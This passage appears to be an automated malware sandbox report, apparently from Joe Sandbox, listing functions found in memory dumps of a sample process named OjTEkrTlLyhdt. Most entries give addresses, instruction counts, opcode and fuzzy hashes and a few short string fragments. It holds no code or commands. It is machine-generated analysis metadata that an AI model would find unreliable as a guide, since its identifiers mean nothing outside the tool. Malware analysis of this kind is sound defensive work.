                  • Opcode Fuzzy Hash: 6f0ffbcfac03a47d36d7b3f74228050395594157ded70dd1aaf36148a84fd8aa
                  • Instruction Fuzzy Hash: 1F11C131A0A54E4BEB99EB64C8696BA7BF0FF18300F0105BFD42AC60A2DE75A6448740
                  Function 00007FFD9BA16121 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1cda6aa3450f0b244c881ce35d4980b261333b8d95be3ff4f9a481f14b88db4d
                  • Instruction ID: f3cac66e20c52f2cb4d67554ef1367eff0c9918711c444b624b67c2893029ded
                  • Opcode Fuzzy Hash: 1cda6aa3450f0b244c881ce35d4980b261333b8d95be3ff4f9a481f14b88db4d
                  • Instruction Fuzzy Hash: 5E11C630A0A54E4FDB98EB6884792B97BA1EF15300F0604BFD45EC70E3DEA56644C701
                  Function 00007FFD9BA0CAE0 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 97250085d443fc851e587dfc1f559f62a7a9a0c37925938ed7da3774828fd9fc
                  • Instruction ID: 71aaa06cedf7715e38cdb86196e7932ec65b9acccc0acc262b4295853c5e056a
                  • Opcode Fuzzy Hash: 97250085d443fc851e587dfc1f559f62a7a9a0c37925938ed7da3774828fd9fc
                  • Instruction Fuzzy Hash: B6119130A0E64E4FDB56EB68C8685B97BB0FF1A300F0504BBD459C70A2EE795A84C740
                  Function 00007FFD9BA170ED Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd0be317370e8b27a94791008c9435193912fbfe8031c665bd527064f8eaf3ef
                  • Instruction ID: db55468d3ca10c925c28e087915d46476a464e6fc6bb44cb8ca6591977597c18
                  • Opcode Fuzzy Hash: cd0be317370e8b27a94791008c9435193912fbfe8031c665bd527064f8eaf3ef
                  • Instruction Fuzzy Hash: 25110170A0A64E4FEBA8EF64C4696B93BA0EF19300F0110BED40DC21A2DEB46A408781
                  Function 00007FFD9BA162D9 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 97ecd193151b9f59772181d3cfefe703db9d8c1ab9c0831b028525da65ca1b1e
                  • Instruction ID: 1a0450bd5e1a9067bef557305abee465ff5e6b707d49ddcad87529dd585081c0
                  • Opcode Fuzzy Hash: 97ecd193151b9f59772181d3cfefe703db9d8c1ab9c0831b028525da65ca1b1e
                  • Instruction Fuzzy Hash: 5E117371E0E64E8FE791EB6888695A97FF0FF19300F4605BAD45CC70A2EE74A644C741
                  Function 00007FFD9BA0BD95 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82f510f3807404ecc297ab7c77ad442458ac5597a45ab311e24248c876d7d1e0
                  • Instruction ID: babd93b6158e4ecd44b062ea7811017d0ac5996d97f8a3536337e006893c8474
                  • Opcode Fuzzy Hash: 82f510f3807404ecc297ab7c77ad442458ac5597a45ab311e24248c876d7d1e0
                  • Instruction Fuzzy Hash: 5611A130A0A64E8FEB94EF68C4682BDBBE0FF19300F8104BED45AC31A1DB75A650C700
                  Function 00007FFD9BA0C219 Relevance: .1, Instructions: 52COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 603e47f737c2910f0a017598d689f9af6f6c447264d7b3ac554cdbe5dfab5eee
                  • Instruction ID: cdfc7f4c90739e6224f6c67dce39fd9232fb686bd370d135da10ece42484c4fc
                  • Opcode Fuzzy Hash: 603e47f737c2910f0a017598d689f9af6f6c447264d7b3ac554cdbe5dfab5eee
                  • Instruction Fuzzy Hash: F911C230A0964D8FDB55EFA8C4692BA3BB0FF1A300F4605BFD459C75A2DB799644C700
                  Function 00007FFD9BA0C609 Relevance: .1, Instructions: 51COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9b35f89d3205c6efdc6b9417a9b0cdef6d7dc3d07772414aa8cf16577a1a12d
                  • Instruction ID: c1901440b096d655afb19fc2583f64ee5804f353d91cb85a4c3d3c52b45eded6
                  • Opcode Fuzzy Hash: f9b35f89d3205c6efdc6b9417a9b0cdef6d7dc3d07772414aa8cf16577a1a12d
                  • Instruction Fuzzy Hash: E611E530A0A64E8FDB69EF64C4651B93FA1FF5A300F1110BED449C71A2DA799654C740
                  Function 00007FFD9BA005D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77dfb9a300222f4724138ed6d0fee12affd2b24c5f55ce028df551077832fb54
                  • Instruction ID: eceb38f3c78a6f6ca8ebaa4d322322ac93c3e8b93270a6531754d0026d31910f
                  • Opcode Fuzzy Hash: 77dfb9a300222f4724138ed6d0fee12affd2b24c5f55ce028df551077832fb54
                  • Instruction Fuzzy Hash: 29019E30A0950E8FDB98EF68C4656FA77A1FF6A304F11447EE41EC31A4CE75A650CB40
                  Function 00007FFD9BA0D79D Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41cf576880ae749eb70d8bcd810349fa1552d51400499c4a54ff1fa8e98789a5
                  • Instruction ID: 02dc40b31a0b8ea509f15e4abec3134afbd2f888ce7b4718bae70c5d5b76063f
                  • Opcode Fuzzy Hash: 41cf576880ae749eb70d8bcd810349fa1552d51400499c4a54ff1fa8e98789a5
                  • Instruction Fuzzy Hash: F9115B30A0964E8FDB64EF68C4696BD7BB0FF19304F5104BED86AC61A2DB75A654CB00
                  Function 00007FFD9BA177F9 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 95866106220e79c38936383aa757cde6ea012bb68fb26cbd876ebd1345a4259b
                  • Instruction ID: 3d93b0a7ad03f960652fa3a28ad44e0b0f20e05ec0cbdf5d520f88be92dae89f
                  • Opcode Fuzzy Hash: 95866106220e79c38936383aa757cde6ea012bb68fb26cbd876ebd1345a4259b
                  • Instruction Fuzzy Hash: 4601D870A4F68D4FE792AB7488695A97FE0EF15300F0624F7D008C70A2DA64A984C301
                  Function 00007FFD9BA17D99 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdc1093c4f395d1d86c6b391c8d6f8dacc26ab6694bfdcc67006817888e37e65
                  • Instruction ID: 350ab8b287ed77d01e3cbf0fe8a2ba4d2df1b6047f46e5bfc791357f7194f7f9
                  • Opcode Fuzzy Hash: bdc1093c4f395d1d86c6b391c8d6f8dacc26ab6694bfdcc67006817888e37e65
                  • Instruction Fuzzy Hash: ED018070A0F68D4FDB96EB74C8656B93BA0EF15304F4614FAD41AC60E2DE65AA44CB01
                  Function 00007FFD9BA01CE1 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8528e1519a86e7e07f7afd3cf5c5c67c5edff65a87d4a1c9449092b7ac5506e
                  • Instruction ID: d9d91717550e1a68ec71c828ab80d32755691ac30a05bbf854faf5af5efd2a3e
                  • Opcode Fuzzy Hash: a8528e1519a86e7e07f7afd3cf5c5c67c5edff65a87d4a1c9449092b7ac5506e
                  • Instruction Fuzzy Hash: BD01A430A0A68E8FDB99DF64C4656FA3BA0FF67304F5100BAE849C71A2DB79D550CB40
                  Function 00007FFD9BA17E0D Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 946213d65320f768c841f336e0e937d4cc85cb7f45b6506d633fc440049b235d
                  • Instruction ID: 172deefa4c25d0ff33a5577e6a802c3256b2b55713c40fc7a9fb1703000ae4c0
                  • Opcode Fuzzy Hash: 946213d65320f768c841f336e0e937d4cc85cb7f45b6506d633fc440049b235d
                  • Instruction Fuzzy Hash: BA01D430A1924E4FDB99EF74C4695BA37E0EF09308F0124BED01AC71E2DB34A950C741
                  Function 00007FFD9BA028ED Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 974e0f1456fbc547828c50c7adc291ee28bb41ec7016c0b66ffe7ba8ab974851
                  • Instruction ID: 3989762ac11004b0eaa80af4d562c41a92e76558984772af5090ed4a5152767f
                  • Opcode Fuzzy Hash: 974e0f1456fbc547828c50c7adc291ee28bb41ec7016c0b66ffe7ba8ab974851
                  • Instruction Fuzzy Hash: 85018F30E0A74E4FE762EBA484686BA7BE0EF1A300F4645B6D448C70B6EE74E244C741
                  Function 00007FFD9BA02F89 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fc1ed56ee4dc3ced74213f49609a94d08ed2228db01e3a22bf17210f33ffd364
                  • Instruction ID: 0fa0816c6ec59418387225229326990d770d17c02122b9ed9fbd8a1e70a2732c
                  • Opcode Fuzzy Hash: fc1ed56ee4dc3ced74213f49609a94d08ed2228db01e3a22bf17210f33ffd364
                  • Instruction Fuzzy Hash: 1001D870A0E74D4FE752A7B488695A97FE0EF16340F0604F6D489C70B6DA74A5548301
                  Function 00007FFD9BA0AC59 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 49b9c35b52a311e716a0d7a6321af41ac73f41276ef6a8b316ad335f0f0b436f
                  • Instruction ID: ffba3c373b959de7c92feb1e18efe9e44023493c2ae2f8ae5feebe8dea0fc770
                  • Opcode Fuzzy Hash: 49b9c35b52a311e716a0d7a6321af41ac73f41276ef6a8b316ad335f0f0b436f
                  • Instruction Fuzzy Hash: 6F01A730A4E34E4FD762EBB4C4695A97BE0EF16300F0705F6D448C70B6DA74E6448701
                  Function 00007FFD9BA00608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a78cd38cc1842d8d8822d74ef1ce750e9f2de472e6e24ca3d7fcf4a1dd9fd71
                  • Instruction ID: 1a49523b88ca883c63227a04d6f2751f06d5b42cea8c07dcd51b9c50f1b64c3c
                  • Opcode Fuzzy Hash: 6a78cd38cc1842d8d8822d74ef1ce750e9f2de472e6e24ca3d7fcf4a1dd9fd71
                  • Instruction Fuzzy Hash: 7A01AD34A1970E8BEB68EFA4C0286BD33A0FF19304F1008BEE41EC21E4DE75A248C600
                  Function 00007FFD9BA00610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fcc2c6b7edf4f4d4bcf7401431c76a8ea89127d9189c586a4654078dc9ee77d
                  • Instruction ID: aff08f8189602897cabc7ea848cd11ac56180d199e2ffaa4005a81f7d89233cd
                  • Opcode Fuzzy Hash: 3fcc2c6b7edf4f4d4bcf7401431c76a8ea89127d9189c586a4654078dc9ee77d
                  • Instruction Fuzzy Hash: A201AD30A09B0E8AEB59EBA4C0286B973A0FF09305F1008BEE41EC21E4CF75A284C600
                  Function 00007FFD9BA0ACC5 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 72e44a9b6588d4a648a53a47aa14b95e98b8eacfd646ac2b7f6a28661cd39d48
                  • Instruction ID: 7a5dc19bb75f60857ee39450c56a85434441f4b3a978e89c09e530424d9ddd37
                  • Opcode Fuzzy Hash: 72e44a9b6588d4a648a53a47aa14b95e98b8eacfd646ac2b7f6a28661cd39d48
                  • Instruction Fuzzy Hash: 6E018121A1F38E4FD362ABA498A51E93BB0AF43314F4B05F7D0C9C60B3D96995488351
                  Function 00007FFD9BA1563B Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a14ab7efc65cdaa881bf873935a791f8e536adc9d4af7a3a99bea865a31bb111
                  • Instruction ID: 3b486a79ee97aa9ac28b4d82836669ece1407b9eb2fb359537f8dc36da85478c
                  • Opcode Fuzzy Hash: a14ab7efc65cdaa881bf873935a791f8e536adc9d4af7a3a99bea865a31bb111
                  • Instruction Fuzzy Hash: E4F0F975E1991D8FDFA4EB9898957ECB7B1FB58300F415066D00CE3262DF7869458B40
                  Function 00007FFD9BA01230 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eeeccbaec99bbf7fcd4307ce964550f4f2e77ed739cfd209ec8f7d755d63e134
                  • Instruction ID: 62febb663c3a87fca44421adda7508274f9889dea85ef3867508e6275a24786a
                  • Opcode Fuzzy Hash: eeeccbaec99bbf7fcd4307ce964550f4f2e77ed739cfd209ec8f7d755d63e134
                  • Instruction Fuzzy Hash: 70F0A970F1A54F4AEF649BA888682FA77E4EF6B204F01043AF49DC20E1DE7456448240
                  Function 00007FFD9BA00FB4 Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 829e9dbbb70e4373259b6c3d009005ff2061faf8d53064eff635200060ee163b
                  • Instruction ID: fc3c34826e865e323979a2ca4c1876ed05870e1882dd19c42db08d1d5b4c8221
                  • Opcode Fuzzy Hash: 829e9dbbb70e4373259b6c3d009005ff2061faf8d53064eff635200060ee163b
                  • Instruction Fuzzy Hash: 03016D30F0550E8BEB60EB58D890AEEB3B1EB45301F1181B6D409E3294DE75AE448F84
                  Function 00007FFD9BA0B37F Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: db5b5233b8a76a10c5a16167e4a906d4d3657868600efd2c2fb75e3eff8e049a
                  • Instruction ID: 94221723537326b479296f3ec7e53d8d9e544236aca7b2ed7e7e2c4256520b7b
                  • Opcode Fuzzy Hash: db5b5233b8a76a10c5a16167e4a906d4d3657868600efd2c2fb75e3eff8e049a
                  • Instruction Fuzzy Hash: 3C017170E0961E8FDB24DF90C490AFEB3B1EF55300F604676C409A2295DF78AA85CB80
                  Function 00007FFD9BA02809 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction ID: e9ded1e7a39c2288d19f58994c3d64cc1434d502ad49feb5176d5f7f83747c58
                  • Opcode Fuzzy Hash: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction Fuzzy Hash: 15F0963490E38D8FD76A9F7088251A93F60BF56201F4604FAE449C61F2DB78D558C701
                  Function 00007FFD9BA0287D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction ID: 45db22eca49bf6d55f29746af9659d65589cf408075368fb500bfbacb40a3961
                  • Opcode Fuzzy Hash: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction Fuzzy Hash: DEF0E93090E78D8FE75A5FB088245B937A0BF46305F4604BFF859C60E2DB789658C701
                  Function 00007FFD9BA16BDB Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction ID: 623a4923ecb62766fbe44c18dff96c20ed2e42141390b8d42f583171f90aabdb
                  • Opcode Fuzzy Hash: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction Fuzzy Hash: E8F09770D1951E8FEBA8EB99D4A4BFCB7B1EB54305F1140BED41DA2291CE781A80DF10
                  Function 00007FFD9BA11000 Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction ID: 012d7b0f8ad93769316be76febafb4fc864fc364257ae5f617669532e982edff
                  • Opcode Fuzzy Hash: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction Fuzzy Hash: 7BC0023591455E9BDF50EF94D8555EE73A5FF54201F000526A82DD3151DB70A6208B40

                  Non-executed Functions

                  Function 00007FFD9BA11019 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#$&$)$+$[$}
                  • API String ID: 0-4069700903
                  • Opcode ID: 673095d4b8ac266de434db5b54cf4a5db604de6f4607a02007f917ef9a5b853f
                  • Instruction ID: 04643fdb568ea9f5a3af98fbc9a00099da532c279d41d27eefdaa4cbcad23371
                  • Opcode Fuzzy Hash: 673095d4b8ac266de434db5b54cf4a5db604de6f4607a02007f917ef9a5b853f
                  • Instruction Fuzzy Hash: E6A1E670E0926D8EEBA8DF54C8A47FDB7B1AF54300F5140BAD04D97291DBB86A84DF01

                  Executed Functions

                  Function 00007FFD9BA13655 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_H
                  • API String ID: 0-402390507
                  • Opcode ID: 8c93f6dd707de518f30e61b2e19ed872c90ab1bcb87ad106eff65078deec99bc
                  • Instruction ID: e5152454bea255b5d5d3311cb20cfddabaa85ffa9f4018c89bee9c8add3487ef
                  • Opcode Fuzzy Hash: 8c93f6dd707de518f30e61b2e19ed872c90ab1bcb87ad106eff65078deec99bc
                  • Instruction Fuzzy Hash: CB91B171A1994E8FEB94DB6CC8657AC7BE1EFA9310F5001BAD05DD72DACBB42805CB40
                  Function 00007FFD9BA1EEC7 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$O$Q${
                  • API String ID: 0-1370898747
                  • Opcode ID: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction ID: a9a965af2f8beb9567f01c68d71a068c816c860216b0431124e0f6b3adf763f4
                  • Opcode Fuzzy Hash: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction Fuzzy Hash: C421B770E0962D8FEBA4DF54C8547E9B6B2BB54301F0551F9D40DA62A1CBB96B84CF40
                  Function 00007FFD9BA1EA63 Relevance: 3.9, Strings: 3, Instructions: 137COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: 1f7f209dc65dafb90b994379baa6a986a858f8a3067549f79b6b24bbb4023c36
                  • Instruction ID: 6299845d5c67e20c092f955893f3f75fdc271585c3856fd1aebf345e617ddc35
                  • Opcode Fuzzy Hash: 1f7f209dc65dafb90b994379baa6a986a858f8a3067549f79b6b24bbb4023c36
                  • Instruction Fuzzy Hash: 055105B1E0562D8BDBA8DF18C8957A9B7B1FF58301F1041EAE10DE32A1DA746E818F45
                  Function 00007FFD9BA1DAA9 Relevance: .4, Instructions: 415COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
